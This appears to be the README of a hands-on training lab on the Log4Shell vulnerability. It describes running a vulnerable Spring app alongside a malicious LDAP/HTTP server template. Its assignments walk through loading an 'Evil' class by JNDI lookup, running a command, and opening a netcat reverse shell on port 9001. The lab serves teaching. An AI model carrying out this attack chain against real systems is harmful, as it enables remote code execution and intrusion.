Skip to content

mika-bar/log4j-minilab

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 

Repository files navigation

LOG4J Mini Lab

The Log4J incident from December 2021 was one of the biggest and most impactful security issues in recent Java history.

In this minilab, we will look into the vulnerability and try to create our own server.

Check out this repository

git clone https://github.com/bmvermeer/log4j-minilab.git

The repository contains an application and a template for a malicious log4shell server.

Running the application

cd log4japp
./mvnw compile spring-boot:run 

Running the server

cd log4shell-server 
./mvnw compile exec:java

The application contains a vulnerable Log4j version. It evaluates JNDI commands and you can connect to an LDAP server that you own to create arbitrary code execution. The log4shell-server already contains an incomplete LDAP server based on the marschalsec project by Moritz Bechler. This server gives a reference to Evil.class which is served to you using an HTTP server. Both the LDAP server and the HTTP are fully functional.

Assignment 1

check if we are vulnerable

  • Startup the log4japp
  • go to http://localhost:8080/
  • try to login with an incorrect username and password.
  • See in the console what is logged
  • Check if we use a log4j version that is vulnerable (<2.15)
  • Startup the log4shell-server and try to connect to to the server
  • If the console gives you a javax.naming.NamingException with Root exception is java.lang.ClassCastException, than you are on the correct spot.

Assignment 2

Implement class Evil

Implement class Evil so it will print “HACKED AT DEVOXXUK” when we load it using the LDAP string from before.

Assignment 3

Try to execute a command.

For instance open the calculator on your machine.

Assignment 4

Create a reversed shell attack

  • Install netcat on your machine
  • Open netcat and listen to port 9001 (in a new shell window)
  • Edit your Evil class so it opens a connection to your (local) host on port 9001
  • If everything works out, netcat is now connected to your machine and you have shell access. Imagine doing this on a remote machine :)

About

log4j-minilab

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Java 100.0%